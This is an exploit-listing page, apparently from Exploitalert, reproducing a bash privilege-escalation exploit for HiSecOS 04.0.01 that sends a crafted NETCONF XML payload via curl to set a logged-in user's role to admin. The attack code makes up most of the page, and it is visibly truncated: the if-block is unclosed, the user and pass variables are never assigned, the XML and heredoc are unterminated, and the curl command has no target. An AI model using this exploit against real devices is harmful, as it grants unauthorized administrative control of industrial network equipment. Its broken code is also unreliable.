HiSecOS 04.0.01 Privilege Escalation

CVE Category Price Severity
CWE-332 $5,000 High
Author Risk Exploitation Type Date
Unknown High Local 2023-06-22
Our sensors found this exploit at:

Below is a copy:

HiSecOS 04.0.01 Privilege Escalation
# Exploit Title: HiSecOS 04.0.01 - Privilege Escalation
# Google Dork: HiSecOS Web Server Vulnerability Allows User Role Privilege Escalation
# Date: 21.06.2023
# Exploit Author: dreizehnutters
# Vendor Homepage:
# Version: HiSecOS-04.0.01 or lower
# Tested on: HiSecOS-04.0.01
# CVE: BSECV-2021-07


if [[ $# -lt 3 ]]; then
  echo "Usage: $0 <IP> <USERNAME> <PASSWORD>"
  exit 1


# Craft basic header
auth=$(echo -ne "$user:$pass" | base64)

# Convert to ASCII hex
blob=$(printf "$user" | xxd -ps -c 1)

# Generate XML payload ('15' -> admin role)
gen_payload() {
  cat <<EOF
<rpc xmlns="urn:ietf:params:xml:ns:netconf:base:1.0" xmlns:xsi="" xsi:schemaLocation="urn:x-mops:1.0 ../mops.xsd" message-id="20">
  <mibOperation xmlns="urn:x-mops:1.0">
        <MIB name="HM2-USERMGMT-MIB">
          <Node name="hm2UserConfigEntry">
              <Attribute name="hm2UserName">$blob</Attribute>
            <Set name="hm2UserAccessRole">15</Set>

curl -i -s -k -X POST \
  -H "content-type: application/xml" \
  -H "authorization: Basic ${auth}" \
  --data-binary "$(gen_payload)" \

echo "[*] $user is now an admin"

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.